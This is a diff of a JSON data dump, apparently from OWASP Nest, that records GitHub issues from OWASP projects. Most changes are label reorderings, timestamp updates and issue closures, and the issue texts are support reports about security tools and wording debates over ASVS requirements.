"assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32575,8 +32575,8 @@ "repository": 1127, "assignees": [], "labels": [ - 207, - 222 + 222, + 207 ] } }, @@ -32606,8 +32606,8 @@ "repository": 1127, "assignees": [], "labels": [ - 215, - 222 + 222, + 215 ] } }, @@ -32637,8 +32637,8 @@ "repository": 1127, "assignees": [], "labels": [ - 215, - 222 + 222, + 215 ] } }, @@ -32668,8 +32668,8 @@ "repository": 1127, "assignees": [], "labels": [ - 215, - 222 + 222, + 215 ] } }, @@ -32699,8 +32699,8 @@ "repository": 1127, "assignees": [], "labels": [ - 215, - 222 + 222, + 215 ] } }, @@ -32730,8 +32730,8 @@ "repository": 1127, "assignees": [], "labels": [ - 215, - 222 + 222, + 215 ] } }, @@ -32761,8 +32761,8 @@ "repository": 1127, "assignees": [], "labels": [ - 215, - 222 + 222, + 215 ] } }, @@ -34932,8 +34932,8 @@ 514 ], "labels": [ - 222, - 224 + 224, + 222 ] } }, @@ -35003,7 +35003,7 @@ "pk": 1147, "fields": { "nest_created_at": "2024-09-11T21:26:43.935Z", - "nest_updated_at": "2024-09-18T19:04:10.090Z", + "nest_updated_at": "2024-09-22T06:36:29.539Z", "node_id": "I_kwDOBCbAAs6WBW6e", "title": "[TOOL] Add pidcat", "body": "The tools assists in filtering the logs of a specific android application in a color-coded format.\r\n\r\nlink: https://github.com/JakeWharton/pidcat", @@ -35019,7 +35019,7 @@ "comments_count": 2, "closed_at": null, "created_at": "2024-09-10T16:34:54Z", - "updated_at": "2024-09-10T16:53:54Z", + "updated_at": "2024-09-19T16:52:36Z", "author": 506, "repository": 1127, "assignees": [ @@ -35120,7 +35120,7 @@ "pk": 1151, "fields": { "nest_created_at": "2024-09-11T21:27:10.433Z", - "nest_updated_at": "2024-09-18T18:18:25.814Z", + "nest_updated_at": "2024-09-22T18:24:08.514Z", "node_id": "I_kwDOBBEVjM5aTH6_", "title": "Does this project still have some support?", "body": "", @@ -35436,7 +35436,7 @@ "pk": 1162, "fields": { "nest_created_at": "2024-09-11T21:27:51.261Z", - "nest_updated_at": "2024-09-18T18:18:34.718Z", + "nest_updated_at": "2024-09-22T18:24:47.280Z", "node_id": "MDU6SXNzdWUzODkyMTYyOTQ=", "title": "Joomscan does nothing on basic scan", "body": "So I've opened up a privileged cmd window and I have perl installed, then I navigate to the folder where I extracted joomscan. However when I run the basic command `perl joomscan.pl --url www.mywebsite.com` I'm just returned to the prompt, nothing happens. I've checked the \"reports\" folder but nothing there either.\r\n\r\nWindows 10 Professional, 64bit", @@ -36253,9 +36253,9 @@ "repository": 1132, "assignees": [], "labels": [ + 232, 230, - 231, - 232 + 231 ] } }, @@ -36315,8 +36315,8 @@ "repository": 1132, "assignees": [], "labels": [ - 230, - 233 + 233, + 230 ] } }, @@ -36406,8 +36406,8 @@ 198 ], "labels": [ - 229, - 235 + 235, + 229 ] } }, @@ -36932,8 +36932,8 @@ "repository": 1132, "assignees": [], "labels": [ - 229, - 236 + 236, + 229 ] } }, @@ -37420,7 +37420,7 @@ "pk": 1229, "fields": { "nest_created_at": "2024-09-11T21:29:19.981Z", - "nest_updated_at": "2024-09-18T19:10:48.657Z", + "nest_updated_at": "2024-09-22T20:24:24.823Z", "node_id": "I_kwDOA_2m3c5L4aw_", "title": "Broken link on Insecure Design page", "body": "The link is on https://owasp.org/Top10/A04_2021-Insecure_Design/\r\nThe link says \"OWASP Cheat Sheet: Secure Design Principles\" and takes me to \r\n(https://owasp.org/Top10/A04_2021-Insecure_Design/Coming%20Soon)\r\n\r\nI realize that it takes me to a page that isn't done yet, but it doesn't even say \"Coming Soon.\" It has a few black rectangles, some indecipherable graphics, some unstyled html, before ending with a 404 message.\r\n\r\nGood luck.", @@ -39064,7 +39064,7 @@ "pk": 1287, "fields": { "nest_created_at": "2024-09-11T21:30:26.600Z", - "nest_updated_at": "2024-09-18T18:18:50.702Z", + "nest_updated_at": "2024-09-22T18:25:56.672Z", "node_id": "I_kwDOA8L0X85dgabh", "title": "QR code not loading", "body": "Hi I am getting below logs and the QR code is not loading. Could anyone please help me.\r\n\r\n\r\n\r\nQrlJacker Module(grabber/whatsapp) > run\r\n[+] Using the default useragent\r\n[+] Running a thread to keep the QR image [whatsapp]\r\n[+] Waiting for sessions on whatsapp\r\n[+] Running a thread to detect Idle once it happens then click the QR reload button\r\n[whatsapp]\r\n[+] Initializing webserver... [whatsapp]\r\n
QrlJacker Module(grabber/whatsapp) > ----------------------------------------\r\nException occurred during processing of request from ('127.0.0.1', 43532)\r\nTraceback (most recent call last):\r\nFile \"/usr/lib/python3.10/http/server.py\", line 727, in send_head\r\nf = open(path, 'rb')\r\nFileNotFoundError: [Errno 2] No such file or directory: '/home/rockstar005\r\nDownloads/QRLJacking/QRLJacker/core/www/whatsapp/tmp.png'\r\n
During handling of the above exception, another exception occurred:\r\n
Traceback (most recent call last):\r\nFile \"/usr/lib/python3.10/socketserver.py\", line 316, in _handle_request_noblock\r\nself.process_request(request, client_address)\r\nFile \"/usr/lib/python3.10/socketserver.py\", line 347, in process_request\r\nself.finish_request(request, client_address)\r\nFile \"/usr/lib/python3.10/socketserver.py\", line 360, in finish_request\r\nself.RequestHandlerClass(request, client_address, self)\r\nFile \"/home/rockstar005/Downloads/QRLJacking/QRLJacker/core\r\nmodule_utils.py\", line 27, in __init__\r\nsuper().__init__(*args, directory=serve_dir, **kwargs)\r\nFile \"/usr/lib/python3.10/http/server.py\", line 668, in __init__\r\nsuper().__init__(*args, **kwargs)\r\nFile \"/usr/lib/python3.10/socketserver.py\", line 747, in __init__\r\nself.handle()\r\nFile \"/usr/lib/python3.10/http/server.py\", line 433, in handle\r\nself.handle_one_request()\r\nFile \"/usr/lib/python3.10/http/server.py\", line 421, in handle_one_request\r\nmethod()\r\nFile \"/usr/lib/python3.10/http/server.py\", line 672, in do_GET\r\nf = self.send_head()\r\nFile \"/usr/lib/python3.10/http/server.py\", line 729, in send_head\r\nself.send_error(HTTPStatus.NOT_FOUND, \"File not found\")File \"/usr/lib/python3.10/http/server.py\", line 488, in send_error\r\nself.wfile.write(body)\r\nFile \"/usr/lib/python3.10/socketserver.py\", line 826, in write\r\nself._sock.sendall(b)\r\nBrokenPipeError: [Errno 32] Broken pipe\r\n----------------------------------------\r\n

QrlJacker Module(grabber/whatsapp) > ", @@ -39850,7 +39850,7 @@ "pk": 1315, "fields": { "nest_created_at": "2024-09-11T21:31:04.677Z", - "nest_updated_at": "2024-09-18T18:19:04.162Z", + "nest_updated_at": "2024-09-22T18:26:15.677Z", "node_id": "MDU6SXNzdWU0NjU3MjE2MDY=", "title": "in apache2 js file,css file not loading shoing only html content", "body": "![Screenshot from 2019-07-09 16-44-47](https://user-images.githubusercontent.com/12762732/60883865-ff000280-a268-11e9-8597-aadf9d27fb6f.png)\r\n", @@ -39961,8 +39961,8 @@ "repository": 1142, "assignees": [], "labels": [ - 247, - 248 + 248, + 247 ] } }, @@ -39992,8 +39992,8 @@ "repository": 1142, "assignees": [], "labels": [ - 247, - 248 + 248, + 247 ] } }, @@ -40030,7 +40030,7 @@ "pk": 1321, "fields": { "nest_created_at": "2024-09-11T21:31:24.992Z", - "nest_updated_at": "2024-09-18T18:19:14.161Z", + "nest_updated_at": "2024-09-22T18:26:30.427Z", "node_id": "I_kwDOA5eWBc5lpyJS", "title": "Archive this project or warn contributors", "body": "The Threat Model Cookbook project has been dormant for a long time, and the [www pages](https://owasp.org/www-project-threat-model-cookbook/) have been archived\r\n\r\n@alyssa-hardin should this repo should also be archived read-only or instead the contributors warned that it is a dormant project?", @@ -40297,8 +40297,8 @@ "repository": 1145, "assignees": [], "labels": [ - 252, - 256 + 256, + 252 ] } }, @@ -40607,9 +40607,9 @@ "repository": 1145, "assignees": [], "labels": [ + 258, 253, - 254, - 258 + 254 ] } }, @@ -40639,9 +40639,9 @@ "repository": 1145, "assignees": [], "labels": [ + 259, 253, - 254, - 259 + 254 ] } }, @@ -40983,8 +40983,8 @@ "repository": 1145, "assignees": [], "labels": [ - 249, - 256 + 256, + 249 ] } }, @@ -41107,8 +41107,8 @@ "repository": 1145, "assignees": [], "labels": [ - 252, - 258 + 258, + 252 ] } }, @@ -41141,8 +41141,8 @@ ], "labels": [ 249, - 257, - 260 + 260, + 257 ] } }, @@ -41243,7 +41243,7 @@ "pk": 1360, "fields": { "nest_created_at": "2024-09-11T21:32:43.268Z", - "nest_updated_at": "2024-09-18T18:19:23.624Z", + "nest_updated_at": "2024-09-22T18:26:44.230Z", "node_id": "MDU6SXNzdWUxOTYwMzg4MTk=", "title": "Rename project_Get to project_Teams", "body": "And the rest call from /project/get/#{project} to /project/teams/#{project}\r\n\r\n![image](https://cloud.githubusercontent.com/assets/656739/21261362/d5f6ed8a-c382-11e6-810d-49311949c265.png)\r\n\r\nIt makes more sense as a name\r\n", @@ -41514,8 +41514,8 @@ "repository": 1145, "assignees": [], "labels": [ - 252, - 256 + 256, + 252 ] } }, @@ -41876,9 +41876,9 @@ 273 ], "labels": [ + 264, 261, - 263, - 264 + 263 ] } }, @@ -41910,8 +41910,8 @@ 273 ], "labels": [ - 261, - 264 + 264, + 261 ] } }, @@ -41941,8 +41941,8 @@ "repository": 1151, "assignees": [], "labels": [ - 261, - 264 + 264, + 261 ] } }, @@ -42097,9 +42097,9 @@ "repository": 1151, "assignees": [], "labels": [ + 265, 261, - 262, - 265 + 262 ] } }, @@ -42129,9 +42129,9 @@ "repository": 1151, "assignees": [], "labels": [ + 266, 261, - 262, - 266 + 262 ] } }, @@ -42192,9 +42192,9 @@ "repository": 1151, "assignees": [], "labels": [ + 265, 261, - 262, - 265 + 262 ] } }, @@ -42287,9 +42287,9 @@ "repository": 1151, "assignees": [], "labels": [ + 267, 261, - 263, - 267 + 263 ] } }, @@ -42319,8 +42319,8 @@ "repository": 1151, "assignees": [], "labels": [ - 261, - 266 + 266, + 261 ] } }, @@ -42381,8 +42381,8 @@ "repository": 1151, "assignees": [], "labels": [ - 261, - 267 + 267, + 261 ] } }, @@ -42414,8 +42414,8 @@ 271 ], "labels": [ - 261, - 264 + 264, + 261 ] } }, @@ -42445,8 +42445,8 @@ "repository": 1151, "assignees": [], "labels": [ - 261, - 264 + 264, + 261 ] } }, @@ -42476,9 +42476,9 @@ "repository": 1151, "assignees": [], "labels": [ - 261, 264, - 267 + 267, + 261 ] } }, @@ -42508,9 +42508,9 @@ "repository": 1151, "assignees": [], "labels": [ - 261, 264, - 267 + 267, + 261 ] } }, @@ -42540,8 +42540,8 @@ "repository": 1151, "assignees": [], "labels": [ - 261, - 264 + 264, + 261 ] } }, @@ -42571,8 +42571,8 @@ "repository": 1151, "assignees": [], "labels": [ - 261, - 266 + 266, + 261 ] } }, @@ -43032,7 +43032,7 @@ "pk": 1418, "fields": { "nest_created_at": "2024-09-11T21:34:41.853Z", - "nest_updated_at": "2024-09-18T18:19:43.567Z", + "nest_updated_at": "2024-09-22T18:27:08.831Z", "node_id": "MDU6SXNzdWU1Mzk0MDA2MTU=", "title": "`block (2 levels) in get_options': undefined local variable or method `path' for Glue::Options:Module (NameError)", "body": "Unable to run glue locally.\r\n\r\n`$ glue -T report.json \r\n\r\n/Library/Ruby/Gems/2.3.0/gems/owasp-glue-0.9.0/lib/glue/options.rb:49:in `block (2 levels) in get_options': undefined local variable or method `path' for Glue::Options:Module (NameError)\r\n\tfrom /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/optparse.rb:1578:in `block in parse_in_order'\r\n\tfrom /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/optparse.rb:1534:in `catch'\r\n\tfrom /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/optparse.rb:1534:in `parse_in_order'\r\n\tfrom /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/optparse.rb:1528:in `order!'\r\n\tfrom /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/optparse.rb:1620:in `permute!'\r\n\tfrom /System/Library/Frameworks/Ruby.framework/Versions/2.3/usr/lib/ruby/2.3.0/optparse.rb:1642:in `parse!'\r\n\tfrom /Library/Ruby/Gems/2.3.0/gems/owasp-glue-0.9.0/lib/glue/options.rb:257:in `get_options'\r\n\tfrom /Library/Ruby/Gems/2.3.0/gems/owasp-glue-0.9.0/lib/glue/options.rb:16:in `parse!'\r\n\tfrom /Library/Ruby/Gems/2.3.0/gems/owasp-glue-0.9.0/bin/glue:11:in `'\r\n\tfrom /usr/local/bin/glue:22:in `load'\r\n\tfrom /usr/local/bin/glue:22:in `
'\r\n\r\n$ `", @@ -43062,7 +43062,7 @@ "pk": 1419, "fields": { "nest_created_at": "2024-09-11T21:34:47.543Z", - "nest_updated_at": "2024-09-18T18:19:48.052Z", + "nest_updated_at": "2024-09-22T18:27:18.886Z", "node_id": "MDU6SXNzdWU2Mjc5ODkyNjQ=", "title": "vbscan does not show any information", "body": "cmd = perl vbscan.pl url.com\r\nno output, just says your reports: reports//\r\ngoing to the report files created shows a blank txt file and blank html\r\nPerl version: 5.30.1\r\nuname -an = Darwin root.local 19.4.0 Darwin Kernel Version 19.4.0: Wed Mar 4 22:28:40 PST 2020; root:xnu-6153.101.6~15/RELEASE_X86_64 x86_64", @@ -43361,7 +43361,7 @@ "pk": 1429, "fields": { "nest_created_at": "2024-09-11T21:35:06.472Z", - "nest_updated_at": "2024-09-18T18:19:52.211Z", + "nest_updated_at": "2024-09-22T18:27:24.208Z", "node_id": "MDU6SXNzdWUyNTUwNTE5Mjc=", "title": "Update fails", "body": "ZSC failes to update with the following error message:\r\n\r\n```\r\nzsc> update\r\nyour software version: 1.1.0\r\nlast version released: up_url = 'http://zsc.z3r0d4y.com/zsc_archive/'\r\n\r\nredirects to the main page.", @@ -43684,7 +43684,7 @@ "pk": 1440, "fields": { "nest_created_at": "2024-09-11T21:35:23.633Z", - "nest_updated_at": "2024-09-18T18:19:56.683Z", + "nest_updated_at": "2024-09-22T18:27:31.843Z", "node_id": "MDU6SXNzdWU4MzE0MjkxNw==", "title": "Move OWbot from Heroku into GCE (Google Compute Engine)", "body": "I.e. here https://console.developers.google.com/project/owasp-tests\n", @@ -46819,7 +46819,7 @@ "pk": 1550, "fields": { "nest_created_at": "2024-09-11T21:37:12.148Z", - "nest_updated_at": "2024-09-18T19:08:52.894Z", + "nest_updated_at": "2024-09-22T19:45:04.113Z", "node_id": "I_kwDOAhEkFs6VmRNQ", "title": "\"×\" word in html changes to ×", "body": "if my input string has \"×\" , they changes to \"×\"", @@ -46997,7 +46997,7 @@ "pk": 1556, "fields": { "nest_created_at": "2024-09-11T21:37:28.794Z", - "nest_updated_at": "2024-09-18T18:20:04.564Z", + "nest_updated_at": "2024-09-22T18:27:47.626Z", "node_id": "I_kwDOAg73xM6IqNtG", "title": "Any plan for new version release?", "body": "", @@ -47266,7 +47266,7 @@ "pk": 1565, "fields": { "nest_created_at": "2024-09-11T21:38:10.285Z", - "nest_updated_at": "2024-09-18T18:20:27.230Z", + "nest_updated_at": "2024-09-22T18:28:22.083Z", "node_id": "MDU6SXNzdWU1NDcwMDQ2Nw==", "title": "Map out relationship with 'Simplified Implementation of the Microsoft SDL'", "body": "http://www.microsoft.com/security/sdl/default.aspx\n\ndocs can be downloaded from http://www.microsoft.com/en-us/download/details.aspx?id=12379\n\n![image](https://cloud.githubusercontent.com/assets/656739/5792987/ef319ac2-9f29-11e4-94a0-39dae79a11cc.png)\n", @@ -47489,9 +47489,9 @@ 322 ], "labels": [ + 294, 286, - 287, - 294 + 287 ] } }, @@ -47559,11 +47559,11 @@ 795 ], "labels": [ + 300, 286, 287, 296, - 297, - 300 + 297 ] } }, @@ -47595,9 +47595,9 @@ 322 ], "labels": [ + 296, 286, - 287, - 296 + 287 ] } }, @@ -47606,23 +47606,23 @@ "pk": 1575, "fields": { "nest_created_at": "2024-09-11T21:38:46.693Z", - "nest_updated_at": "2024-09-16T21:05:34.212Z", + "nest_updated_at": "2024-09-22T18:28:34.732Z", "node_id": "MDU6SXNzdWU4ODk3ODQ5MDc=", "title": "Add OAuth2 requirements", "body": "**Ed note:** This issue was originally called \"_v3.5 Token-based Session Management addition_\"\r\n\r\n---\r\n\r\n**Ed note 2:** If you are just joining us, the draft chapter is currently here: [V51 OAuth 2.0 Protocol](https://github.com/OWASP/ASVS/blob/master/5.0/en/0x51-V51-OAuth2.md)\r\n\r\nBefore you review it, read through this issue thread to collect the context and then feel free to open separate issues if you have specific questions or suggestions.\r\n\r\n---\r\n\r\n_Original text starts here:_\r\n\r\n\r\nI think we need to add a control that validates the incoming HTTP request in an API endpoint which issues new access and refresh tokens. Usually this is with the refresh endpoint, but in some weirdly built applications, there were some implementations that every response would contain the new tokens that could be used for the next authenticated and authorized calls to the API. The requirement would be for the refresh token endpoints to have a validation of the requests, URL and request body must be validated before issuing the new set of tokens. \r\n\r\nThe rationale about this thought came to me when I was testing a few recent applications that either have refresh endpoints or a few ones that do not have refresh endpoints but the next authenticated tokens are coming from the HTTP responses. This is a bit of an old way of doing it as I understood and a bit uncommon. However, I noticed a pattern of accepting the request even if it was malformed or missing the object id or any reference for a resource (e.g. http://www.example.com/12345 but I the request was http://www.example.com/ralph; second URL is invalid and should be rejected). The application returns no valuable data except the new set of tokens which can be used for the succeeding calls to the API. I think it was a bad design, but for defense in depth purposes and preventing an attacker for prolonging their usage of the compromised account (which would be cut short had the application been following proper OIDC flow), the application should check for incoming HTTP requests to be correct in format, parameters, etc. and if anything is wrong then reject the request and never send back new tokens. \r\n\r\nI would place this under v3.5 Token-based Session Management. I don't know whether this is still an acceptable thing to worry about and whether the threat model is too low to bother about this control, but I think it just seems like a basic thing that developers should have placed some sort of validation for requests before allowing the scenario described to happen. If this is too low risk, then we could scrap it. \r\n", "summary": "Add a control to validate incoming HTTP requests at API endpoints that issue new access and refresh tokens, particularly focusing on refresh token endpoints where malformed requests could lead to security vulnerabilities. Ensure that both the request URL and body undergo validation to prevent the issuance of new tokens for incorrect or unauthorized requests. Incorporate this requirement under v3.5 Token-based Session Management to enhance security and mitigate risks associated with compromised accounts.", "hint": "Here are possible steps to approach the problem of adding OAuth2 requirements related to validating incoming HTTP requests for issuing access and refresh tokens:\n\n1. **Review Current Draft**: Thoroughly read through the existing draft chapter on OAuth 2.0 Protocol to understand its structure and content, specifically focusing on the Token-based Session Management section.\n\n2. **Identify Gaps**: Note the absence of specific controls for validating incoming requests in the context of token issuance, especially for refresh token endpoints.\n\n3. **Research Best Practices**: Investigate industry standards and best practices related to OAuth2, particularly around token issuance and request validation. Focus on known vulnerabilities and common attack vectors.\n\n4. **Analyze Use Cases**: Gather examples from recent applications where improper validation led to issues, including malformed requests that still received new tokens. Document these cases to support the necessity of your proposed control.\n\n5. **Develop Proposal**: Draft a clear and concise proposal for a new requirement that mandates validation of the HTTP request format, parameters, and body before issuing new access and refresh tokens.\n\n6. **Define Criteria for Validation**: Specify what constitutes a valid request, including acceptable URL formats, required parameters, and any other necessary validation checks.\n\n7. **Evaluate Threat Model**: Assess the potential risks associated with the lack of validation and determine if it aligns with the overall threat model for OAuth implementation.\n\n8. **Solicit Feedback**: Share the proposal with relevant stakeholders, including developers, security experts, and the OWASP community, to gather feedback and suggestions.\n\n9. **Revise Proposal**: Incorporate the feedback received and refine the proposal to ensure it is robust and comprehensive.\n\n10. **Submit Issue**: Open a new issue in the appropriate GitHub repository, detailing the proposed requirement along with supporting arguments, examples, and the revised proposal for inclusion in the OAuth2 Protocol documentation.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/ASVS/issues/996", "number": 996, "sequence_id": 889784907, "is_locked": false, "lock_reason": "", - "comments_count": 63, - "closed_at": null, + "comments_count": 64, + "closed_at": "2024-09-22T14:58:19Z", "created_at": "2021-05-12T07:49:49Z", - "updated_at": "2024-09-16T07:48:42Z", + "updated_at": "2024-09-22T14:58:19Z", "author": 315, "repository": 1166, "assignees": [ @@ -47634,8 +47634,8 @@ ], "labels": [ 286, - 299, - 1121 + 1121, + 299 ] } }, @@ -47667,9 +47667,9 @@ 236 ], "labels": [ + 300, 286, - 287, - 300 + 287 ] } }, @@ -47703,8 +47703,8 @@ 795 ], "labels": [ - 286, - 300 + 300, + 286 ] } }, @@ -47737,9 +47737,9 @@ 795 ], "labels": [ + 296, 286, - 287, - 296 + 287 ] } }, @@ -47771,9 +47771,9 @@ 322 ], "labels": [ + 294, 286, - 287, - 294 + 287 ] } }, @@ -47782,7 +47782,7 @@ "pk": 1580, "fields": { "nest_created_at": "2024-09-11T21:39:01.542Z", - "nest_updated_at": "2024-09-18T19:10:52.819Z", + "nest_updated_at": "2024-09-22T18:28:38.013Z", "node_id": "I_kwDOAYyWqM49o8u2", "title": "clarification needed for 12.4.1", "body": "\r\nCurrent [V12.4.1](https://github.com/OWASP/ASVS/blob/master/4.0/en/0x20-V12-Files-Resources.md#v124-file-storage):\r\n> Verify that files obtained from untrusted sources are stored outside the web root, with limited permissions.\r\n\r\n\r\n\"spin-off\" issue from https://github.com/OWASP/ASVS/issues/1065#issuecomment-944915831\r\n\r\nI'm not too happy with this requirement. It feels a bit from old-style PHP crappy architecture, where file in public folder leads to RCE.\r\n\r\nThe main question is, should we just blindly disallow to store files in public folder in general, or make it a bit more flexible.\r\n\r\n* sometimes files are expected to stay in public folder, like \"public\" images (or we ask them to serve from another domain? is it reasonable?)\r\n* even if .php file is stored in public folder for \"PHP application\", it's important to avoid to execute it as PHP program code (by web-server configuration for example)", @@ -47795,19 +47795,20 @@ "sequence_id": 1034144694, "is_locked": false, "lock_reason": "", - "comments_count": 36, + "comments_count": 39, "closed_at": null, "created_at": "2021-10-23T11:24:09Z", - "updated_at": "2024-09-18T18:42:13Z", + "updated_at": "2024-09-22T17:09:00Z", "author": 795, "repository": 1166, "assignees": [ 795 ], "labels": [ + 1122, + 300, 286, 287, - 300, 302 ] } @@ -47840,9 +47841,9 @@ 801 ], "labels": [ + 304, 300, - 303, - 304 + 303 ] } }, @@ -48004,12 +48005,12 @@ 236 ], "labels": [ - 286, - 287, 293, 306, 307, - 308 + 308, + 286, + 287 ] } }, @@ -48042,11 +48043,11 @@ 795 ], "labels": [ - 286, - 287, 294, 296, - 306 + 306, + 286, + 287 ] } }, @@ -48079,11 +48080,11 @@ 795 ], "labels": [ - 286, - 287, 296, 306, - 307 + 307, + 286, + 287 ] } }, @@ -48092,7 +48093,7 @@ "pk": 1589, "fields": { "nest_created_at": "2024-09-11T21:39:25.918Z", - "nest_updated_at": "2024-09-18T19:10:55.218Z", + "nest_updated_at": "2024-09-22T18:28:40.637Z", "node_id": "I_kwDOAYyWqM5C3XUx", "title": "5.3.1 and 5.3.3 seem duplicate", "body": "5.3.1 | Verify that output encoding is relevant for the interpreter and context required. For example, use encoders specifically for HTML values, HTML attributes, JavaScript, URL parameters, HTTP headers, SMTP, and others as the context requires, especially from untrusted inputs (e.g. names with Unicode or apostrophes, such as ねこ or O'Hara). (C4)\r\n-- | --\r\n\r\n\r\n\r\n5.3.3 | Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. (C4)\r\n-- | --\r\n\r\n\r\n\r\n\r\n\r\n", @@ -48105,10 +48106,10 @@ "sequence_id": 1121809713, "is_locked": false, "lock_reason": "", - "comments_count": 21, + "comments_count": 22, "closed_at": null, "created_at": "2022-02-02T11:28:13Z", - "updated_at": "2024-09-18T17:55:39Z", + "updated_at": "2024-09-22T14:33:49Z", "author": 236, "repository": 1166, "assignees": [ @@ -48117,11 +48118,11 @@ ], "labels": [ 286, - 287, 293, - 301, 307, - 309 + 309, + 301, + 287 ] } }, @@ -48153,9 +48154,9 @@ 322 ], "labels": [ + 296, 286, - 287, - 296 + 287 ] } }, @@ -48189,8 +48190,8 @@ 799 ], "labels": [ - 286, - 300 + 300, + 286 ] } }, @@ -48324,10 +48325,10 @@ 795 ], "labels": [ - 286, - 287, 296, - 307 + 307, + 286, + 287 ] } }, @@ -48361,10 +48362,10 @@ 236 ], "labels": [ - 286, - 293, 297, - 300 + 300, + 293, + 286 ] } }, @@ -48434,9 +48435,9 @@ ], "labels": [ 286, - 287, 293, - 294 + 294, + 287 ] } }, @@ -48471,11 +48472,11 @@ 799 ], "labels": [ - 286, - 287, 293, 311, - 312 + 312, + 286, + 287 ] } }, @@ -48484,7 +48485,7 @@ "pk": 1600, "fields": { "nest_created_at": "2024-09-11T21:40:00.576Z", - "nest_updated_at": "2024-09-17T17:16:50.759Z", + "nest_updated_at": "2024-09-22T06:42:20.113Z", "node_id": "I_kwDOAYyWqM5UkEzM", "title": "proposal: remove 1.14.3 as duplicate of or merge to 14.2.1", "body": "\r\n\r\nRelated requirements:\r\n| # | Description | L1 | L2 | L3 | CWE |\r\n| :---: | :--- | :---: | :---: | :---: | :---: |\r\n| **1.14.3** | Verify that the build pipeline warns of out-of-date or insecure components and takes appropriate actions. | | ✓ | ✓ | 1104 |\r\n| **14.2.1** | Verify that all components are up to date, preferably using a dependency checker during build or compile time. ([C2](https://owasp.org/www-project-proactive-controls/#div-numbering)) | ✓ | ✓ | ✓ | 1026 |\r\n\r\nCWE:\r\n* [CWE-1104](https://cwe.mitre.org/data/definitions/1104.html) - Use of Unmaintained Third Party Components\r\n* [CWE-1026](https://cwe.mitre.org/data/definitions/1026.html) - \"CWE VIEW: Weaknesses in OWASP Top Ten (2017)\"\r\n\r\nProposal:\r\n* remove 1.14.3 as duplicate. If needed, update 14.2.1.\r\n* use CWE-1104 for 14.2.1", @@ -48497,19 +48498,20 @@ "sequence_id": 1418742988, "is_locked": false, "lock_reason": "", - "comments_count": 24, + "comments_count": 26, "closed_at": null, "created_at": "2022-10-21T18:59:46Z", - "updated_at": "2024-09-17T10:43:40Z", + "updated_at": "2024-09-21T05:20:01Z", "author": 795, "repository": 1166, "assignees": [ - 795 + 322 ], "labels": [ + 295, + 300, 286, 287, - 295, 313 ] } @@ -48542,10 +48544,10 @@ 795 ], "labels": [ - 286, - 287, 297, - 307 + 307, + 286, + 287 ] } }, @@ -48577,10 +48579,10 @@ 799 ], "labels": [ - 286, - 287, + 314, 293, - 314 + 286, + 287 ] } }, @@ -48612,11 +48614,11 @@ 799 ], "labels": [ - 286, - 287, 289, 293, - 308 + 308, + 286, + 287 ] } }, @@ -48648,10 +48650,10 @@ 795 ], "labels": [ - 293, - 303, 304, - 315 + 315, + 293, + 303 ] } }, @@ -48660,34 +48662,35 @@ "pk": 1605, "fields": { "nest_created_at": "2024-09-11T21:40:15.633Z", - "nest_updated_at": "2024-09-18T19:10:58.593Z", + "nest_updated_at": "2024-09-22T18:28:43.989Z", "node_id": "I_kwDOAYyWqM5WnL0Y", "title": "user-submitted filename metadata (V12.3)", "body": "[ASVS/0x20-V12-Files-Resources.md at master · OWASP/ASVS · GitHub](https://github.com/OWASP/ASVS/blob/master/5.0/en/0x20-V12-Files-Resources.md)\r\n\r\n| # | Description | L1 | L2 | L3 | CWE |\r\n| :---: | :--- | :---: | :---: | :---: | :---: |\r\n| **12.3.1** | Verify that user-submitted filename metadata is not used directly by system or framework filesystems and that a URL API is used to protect against path traversal. | ✓ | ✓ | ✓ | 22 |\r\n| **12.3.2** | Verify that user-submitted filename metadata is validated or ignored to prevent the disclosure, creation, updating or removal of local files (LFI). | ✓ | ✓ | ✓ | 73 |\r\n| **12.3.3** | Verify that user-submitted filename metadata is validated or ignored to prevent the disclosure or execution of remote files via Remote File Inclusion (RFI) or Server-side Request Forgery (SSRF) attacks. | ✓ | ✓ | ✓ | 98 |\r\n| **12.3.5** | Verify that untrusted file metadata is not used directly with system API or libraries, to protect against OS command injection. | ✓ | ✓ | ✓ | 78 |\r\n\r\nI think \"filename metadata\" is incorrect here. It would be information about the filename, not the filename itself.\r\n\r\nI think \"filename metadata\" should be either \"filename\" or \"file metadata\". I would prefer \"file metadata\", as that would include both the filename and content-type, and any other file information sent by the client.", "summary": "Clarify the terminology by replacing \"filename metadata\" with \"file metadata\" in the documentation, as this term better encompasses not only the filename but also the content-type and other file-related information submitted by the client. Ensure that this change is consistently applied throughout the relevant sections to maintain clarity and accuracy. Update the issue to reflect the preferred terminology and its implications for security practices related to user-submitted files.", "hint": "To approach the problem of clarifying the terminology used in the context of user-submitted file information, you can follow these steps:\n\n1. **Identify the Context**: Understand the context in which the term \"filename metadata\" is used. Review the specific sections of the OWASP ASVS document that reference it.\n\n2. **Analyze Current Terminology**: Evaluate how \"filename metadata\" is currently defined and used. Determine if it accurately conveys the intended meaning or if it leads to confusion.\n\n3. **Gather Examples**: Look for examples within the document or related documents that illustrate how the term \"filename metadata\" is being interpreted.\n\n4. **Propose Alternative Terms**: Consider alternative terms such as \"filename\" or \"file metadata\". Weigh the pros and cons of each term based on clarity and comprehensiveness.\n\n5. **Consult Stakeholders**: Engage with relevant stakeholders, such as security experts, developers, or document authors, to gather their perspectives on the terminology.\n\n6. **Draft a Recommendation**: Based on your findings and stakeholder input, draft a recommendation for the preferred term (e.g., \"file metadata\") along with justification.\n\n7. **Revise Documentation**: Prepare to revise the document to reflect the new terminology, ensuring consistency throughout the text.\n\n8. **Test with Users**: If possible, conduct usability testing with users to see which term they find clearer in context.\n\n9. **Submit for Review**: Submit your proposed changes to the document maintainers for review and possible integration into the official document.\n\n10. **Monitor Feedback**: After implementation, monitor for any feedback or confusion that may arise from the new terminology to ensure it meets user needs effectively. \n\nBy following these steps, you can systematically address the terminology issue while ensuring clarity and accuracy in the documentation.", - "state": "open", - "state_reason": "", + "state": "closed", + "state_reason": "completed", "url": "https://github.com/OWASP/ASVS/issues/1427", "number": 1427, "sequence_id": 